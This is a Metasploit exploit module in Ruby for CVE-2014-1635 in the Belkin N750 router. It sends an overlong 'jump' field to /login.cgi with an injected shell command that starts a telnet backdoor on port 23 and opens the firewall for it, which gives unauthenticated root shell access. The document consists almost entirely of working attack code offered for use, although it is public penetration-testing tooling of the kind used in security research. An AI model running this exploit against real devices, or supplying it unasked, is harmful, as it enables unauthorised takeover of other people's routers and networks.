## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell def initialize super( 'Name' => 'Belkin Devices Unauthenticated Remote Command Execution', 'Description' => %q{ Several Belkin routers firmware 1.10.16.m }, 'Author' => 'Marco Vaz ', # Vulnerability discovery and Metasploit module development 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-1635' ], [ 'URL', 'https://labs.integrity.pt/advisories/cve-2014-1635/' ] ], 'DisclosureDate' => 'May 09 2014', 'Privileged' => true, 'Platform' => ['linux'], 'Targets' => [ ['Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103, firmware 1.10.16.m', {}], ], 'DefaultTarget' => 0, 'DisablePayloadHandler' => 'true' ) end def exploit telnetport = 23 print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}") cmd = "/usr/sbin/utelnetd -p #{telnetport} -d;/usr/sbin/iptables -t nat -I FW_n_PR_GuestAccess 1 -p tcp --dport 23 -j ACCEPT;iptables -I INPUT 1 -p tcp --dport 23 -j ACCEPT" print_status("#{rhost}:#{rport} - Sending exploit request...") request(cmd) begin sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) if sock print_good("#{rhost}:#{rport} - Backdoor utelnetd service has been spawned...") add_socket(sock) else fail_with(Failure::Unknown, "#{rhost}:#{rport} - Backdoor utelnetd service has not been spawned!!!") end end return end def request(cmd) uri = '/login.cgi' jmp = "a"*1379 jmp << ";"+cmd+";" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'vars_post' => { "GO" => "", "jump" => jmp, "pws" => "" } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the web server minhttpd") end end end